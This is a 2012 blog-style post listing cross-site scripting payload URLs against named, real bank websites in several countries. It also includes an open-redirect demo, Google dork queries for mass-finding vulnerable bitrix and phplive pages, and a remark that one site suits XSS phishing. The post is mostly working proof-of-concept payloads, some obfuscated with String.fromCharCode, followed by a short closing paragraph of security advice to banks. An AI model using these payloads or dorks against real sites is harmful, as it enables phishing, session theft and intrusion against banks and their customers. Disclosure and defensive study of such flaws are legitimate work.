# Title: Some bank websites that suffer from Cross-site scripting vulnerabilities. # Author: Sony and Flexxpoint # Data: 21.03.2012 # Sony Blog: http://st2tea.blogspot.com # Flexxpoint Blog : http://flexxpoint.blogspot.com/ # Site: http://insecurity.ro We staged an experiment out of interest. We looked through several randomly selected websites of Worlds banks to check them for vulnerabilities. This was done rather quick even without any specialized software. The results were not surprising. We will demonstrate different bugs of the same type. Demo: http://www.banki.ru/bitrix/rku.php?id=829&goto=http://insecurity.ro Good redirect in bitrix: inurl:bitrix/rk.php http://www.citizensbank.com/ (U.S.) Simple (in the Search) http://www.citizensbank.com/search/?query=Secure%20Plan%22%22%3E%3Cscript%3Ealert%28%22Cross%20Site%20Scripting%22%29%3C/script%3E http://1.bp.blogspot.com/-VXe7DI33JZY/T2oaFz3lNsI/AAAAAAAAAxg/SI3qNHuHhTM/s1600/citiz.JPG https://www.wellsfargo.com/ (U.S.) http://codepad.org/inXkWxYw http://2.bp.blogspot.com/-4D9eFxw2lEo/T2olrOdp20I/AAAAAAAAAyQ/I3tXgGCwy18/s1600/well.JPG http://www.eximb.com (Ukraine) http://www.eximb.com/rus/personal/everyday/internet_banking/?f=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E http://4.bp.blogspot.com/-Tr_xxEc7qb8/T2okk8UQDKI/AAAAAAAAAx4/18ytDW1-1vE/s1600/ukr.JPG http://procreditbank.bg/main/bg/index.php (Bulgaria) https://probanking.procreditbank.bg/regist/default.asp?password2=%22%3E%22%3E%3C/script%3E%3Cscript%3Eeval%28String.fromCharCode%2897,108,101,114,116,40,39,120,115,115,39,41%29%29%3C/script%3E http://2.bp.blogspot.com/-rcnxgpMMEWI/T2ok6TTg1MI/AAAAAAAAAyE/UohK8mVuWv8/s1600/bg.JPG http://www.vtb24.ru (Russia) http://www.vtb24.ru/news/Pages/nizhnij-tagil.aspx?year=2012&category=%3C/script%3E%3Cscript%3Ealert%28%22Cross%20Site%20Scripting%22%29%3C/script%3E http://4.bp.blogspot.com/-9y23IS0u0eE/T2ooHfayKVI/AAAAAAAAAyc/ZnG7d5DkYxQ/s1600/vtb24.JPG http://www.homecredit.ru/ (Russia) https://online.homecredit.ru/ChatApp/login.jsp or.. https://online.homecredit.ru/ChatApp/Chat/HtmlChatFrameSet.jsp We have a html code injection in the chat. http://3.bp.blogspot.com/-g6wV1CxgQ8s/T2oot2nrWrI/AAAAAAAAAyo/tzv1c88OOI4/s1600/%25D1%2585%25D0%25BE%25D1%2583%25D0%25BC%25D0%25BA%25D1%2580%25D0%25B5%25D0%25B4%25D0%25B8%25D1%2582.JPG http://www.mastercardpremium.ru (Russia, but not a official site, but good for xss phishing attack) Simple. http://www.mastercardpremium.ru/search?phrase=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E http://2.bp.blogspot.com/-GNO4Jr9lqXI/T2optstPVbI/AAAAAAAAAy0/YlmZ6-244Bs/s1600/master.JPG http://www.raiffeisen.ch/web/home_de (Switzerland) http://www.raiffeisen.ch/raiffeisen/internet/rb0027.nsf/fAskForDeletionFile?ReadForm&File=%22%3E%22%3E%3C/script%3E%3Cscript%3Eeval%28String.fromCharCode%2897,108,101,114,116,40,39,120,115,115,39,41%29%29%3C/script%3E http://4.bp.blogspot.com/-OhU-4_Ozyfo/T2pLUMNrBjI/AAAAAAAAAzw/hzjXJrKfkoA/s1600/1a.JPG http://boerse.raiffeisen.ch/raiffeisen2/listings/intraday.jsp?listing=998089,4,1&name=SM%22%3E%22%3E%3C/script%3E%3Cscript%3Eeval%28String.fromCharCode%2897,108,101,114,116,40,39,120,115,115,39,41%29%29%3C/script%3E http://2.bp.blogspot.com/-xl85-SjlrgM/T2pLafEU3qI/AAAAAAAAAz8/mgJ-eVLojZA/s1600/2a.JPG http://www.uwcfs.com/ (Czech Republic) XSS in Chat. And we can see: http://www1.migbank.com/ https://www.msufcu.org/ Google Dorks: inurl:/phplive/message_box.php?theme= 1 bug = a lot of web sites.. https://secure.moneypolo.cz/phplive/message_box.php?theme=&l=admin&x=1&deptid=1%22%22%3E%3Cscript%3Ealert%28%22Cross%20Site%20Scripting%22%29%3C/script%3E http://3.bp.blogspot.com/-6Jj21EVa3KI/T2o_UdIZT_I/AAAAAAAAAzY/XaKAhlnwHXw/s1600/internetbank.JPG http://www.bcb.gob.bo/index.php (Bolivia) (but work only on old IE versions,and IE related browsers-Maxton,Green..etc) http://www.bcb.gob.bo/index.php?q=%22%20stYle=%22x:expre/**/ssion%28alert%28/XSS/.source%29%29%20&combos1_1=1&combos1_2=1&combos1_3=1&combos1_4=1&combos1_5=1&combos1_6=1&combos1_7=1&combos1_8=1&combos1_9=1&subcateg1=1&Submit=Buscar http://img29.imageshack.us/img29/4543/screenshot2232012.png http://2.bp.blogspot.com/-usdHXZgWB3k/T2pCJXRUtVI/AAAAAAAAAzk/NQbnfe3RwRw/s1600/bolivia.JPG We would like to add a few words about security. There's no need to panic, perfect security just isn't possible, though we should try to come as close as possible. We would like to give a couple of advices for these banks. They should certainly pay more attention to their IT personnel's competence and discipline, spend their money not only on market research, but also on penetration testing, organize penetration testers' contests like Google and Facebook do or possible have their own staff of penetration testers. The bank personnel should be tested for their vulnerability to social engineering. These are just the basics.